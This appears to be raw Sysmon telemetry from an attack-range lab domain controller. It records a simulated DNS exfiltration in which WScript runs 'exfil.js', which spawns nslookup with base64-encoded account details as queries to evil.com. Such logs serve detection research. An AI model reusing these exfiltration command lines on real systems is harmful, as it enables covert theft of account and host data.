14:16:22.622{2E1864BB-17B6-629A-603F-000000005F02}79961276C:\Windows\system32\conhost.exe{2E1864BB-17B6-629A-5F3F-000000005F02}6856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.607{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-603F-000000005F02}7996C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.590{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.590{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.590{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.590{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.590{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-5F3F-000000005F02}6856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.590{2E1864BB-17A1-629A-783D-000000005F02}55527824C:\Windows\System32\WScript.exe{2E1864BB-17B6-629A-5F3F-000000005F02}6856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.596{2E1864BB-17B6-629A-5F3F-000000005F02}6856C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrjeefe.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.587{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljykcj.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.537{2E1864BB-17B6-629A-5D3F-000000005F02}8160908C:\Windows\system32\conhost.exe{2E1864BB-17B6-629A-5E3F-000000005F02}8C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.520{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-5E3F-000000005F02}8C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.504{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.504{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.504{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.504{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.504{2E1864BB-17B6-629A-5C3F-000000005F02}67127736C:\Windows\system32\cmd.exe{2E1864BB-17B6-629A-5E3F-000000005F02}8C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.517{2E1864BB-17B6-629A-5E3F-000000005F02}8C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B6-629A-5C3F-000000005F02}6712C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljykcj.tmp 2>&1 10341000x8000000000000000197806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.466{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B6-629A-5D3F-000000005F02}8160C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.466{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B6-629A-5D3F-000000005F02}8160C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.451{2E1864BB-17B6-629A-5D3F-000000005F02}8160908C:\Windows\system32\conhost.exe{2E1864BB-17B6-629A-5C3F-000000005F02}6712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.420{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-5D3F-000000005F02}8160C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.404{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.404{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.404{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.404{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.404{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-5C3F-000000005F02}6712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.404{2E1864BB-17A1-629A-783D-000000005F02}55526656C:\Windows\System32\WScript.exe{2E1864BB-17B6-629A-5C3F-000000005F02}6712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.414{2E1864BB-17B6-629A-5C3F-000000005F02}6712C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljykcj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.381{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltbwgzt.tmpMD5=FA64F29A2105005DB944F49BBF99C790,SHA256=AFC24D0EC0C7AAB04F6CC9902001B05F5184E11791617287F2A4C4C94A76A48D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000197794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.497{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52468- 354300x8000000000000000197793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.497{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52467- 354300x8000000000000000197792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.497{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52466- 354300x8000000000000000197791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.497{00000000-0000-0000-0000-000000000000}1700<unknown process>-udptruefalse127.0.0.1-52466-false127.0.0.1-53domain 354300x8000000000000000197790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.423{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52465- 354300x8000000000000000197789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.423{00000000-0000-0000-0000-000000000000}5216<unknown process>-udptruefalse127.0.0.1-52465-false127.0.0.1-53domain 